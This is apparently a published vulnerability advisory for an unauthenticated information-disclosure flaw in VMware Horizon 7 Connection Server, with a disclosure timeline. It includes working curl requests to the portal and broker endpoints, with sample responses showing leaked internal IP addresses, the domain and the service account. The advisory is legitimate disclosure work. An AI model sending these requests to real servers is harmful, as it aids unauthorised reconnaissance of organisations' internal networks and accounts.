Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
85 lines (68 sloc) 2.76 KB

ATREDIS-2018-0005: VMWare Horizon Connection Server Information Disclosure

Vulnerability Type

Information Disclosure

Vendors

  • VMWare

Affected Products

  • VMWare Horizon 7

Summary

The VMWare Horizon Connection Server application exposes sensitive information to an unauthenticated attacker. The Connection Server is often allowed through an organization's firewall in order to support external access to the virtual desktop environment. The information disclosure issues allow an unauthenticated attacker to obtain the IP address, Windows domain name, and service account for the VMWare Horizon Connection Server.

Mitigation

No mitigations are available.

Credit

This vulnerability was found by HD Moore of Atredis Partners

References

Report Timeline

  • 2018-12-12: Atredis Partners sent vulnerability details to VMWare
  • 2018-12-12: VMWare acknowledges the report
  • 2019-01-29: Atredis Partners sent vulnerability details to CERT/CC
  • 2019-03-14: VMWare publishes VMSA-2019-0003
  • 2019-03-15: Atredis Partners publishes this advisory

Technical Details

The VMWare Horizon Connection Server exposes sensitive information via the portal and broker endpoints of the web server.

The portal application leaks the internal IP address of the Connection Server along with any additional X-Forwarded-For headers via the URL /portal/info.jsp:

$ curl https://host/portal/info.jsp

{"acceptLanguage":"en-US","clientVersion":"4.9.0","logLevel":"2","clientIPAddress":"192.168.0.12, 192.168.30.45","contextPath":"/portal","feature":{},"os":"unknown","installerLink":"https://www.vmware.com/go/viewclients"}

The broker endpoint exposes the service account username and Active Directory domain name in the get-configuration response:

$ curl -k -s -XPOST -H 'Content-Type: text/xml' https://host/broker/xml --data-binary $'<?xml version=\'1.0\' encoding=\'UTF-8\'?><broker version=\'10.0\'><get-configuration></get-configuration></broker>'

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<broker version="14.0">
<configuration>
<result>ok</result>
<client-configuration>
	<params>
		<param>
			<name>alwaysSendRdsLicense</name>
			<values>
				<value>true</value>
			</values>
		</param>
	</params>
</client-configuration>
<authentication>
<screen>
<name>cert-auth</name>
<params>
<param>
<name>user</name>
<values>
<value/>
</values>
</param>
</params>
</screen>
</authentication>
<broker-guid>cc20d98a-8fd2-45ae-b805-9952db6ef6d2</broker-guid>
<broker-service-principal>
<type>kerberos</type>
<name>HORIZONSERVER$@CORPORATEDOMAIN.EXAMPLE.COM</name>
</broker-service-principal>
</configuration>
</broker>
You can’t perform that action at this time.